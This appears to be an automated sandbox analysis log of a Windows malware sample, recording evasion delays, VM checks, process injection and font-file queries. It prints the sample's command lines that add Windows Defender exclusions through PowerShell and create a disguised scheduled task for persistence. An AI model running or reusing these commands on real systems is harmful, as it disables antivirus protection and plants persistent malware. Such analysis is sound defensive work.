Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Window / User API: threadDelayed 6891

Source: C:\Users\user\Desktop\nzLoHpgAln.exe TID: 6368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216	Thread sleep count: 5422 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe TID: 7636	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe TID: 7436	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe TID: 7368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe TID: 7528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe TID: 8036	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe TID: 7828	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe TID: 7784	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Thread delayed: delay time: 922337203685477

Source: wZWwzQVEakJvEU.exe, 0000000A.00000002.1856276345.0000000009BF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\M
Source: nzLoHpgAln.exe, 00000008.00000002.1857292891.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: wZWwzQVEakJvEU.exe, 0000000E.00000002.1952277135.0000000001680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\nzLoHpgAln.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory written: C:\Users\user\Desktop\nzLoHpgAln.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory written: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process created: C:\Users\user\Desktop\nzLoHpgAln.exe "C:\Users\user\Desktop\nzLoHpgAln.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp"
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Users\user\Desktop\nzLoHpgAln.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
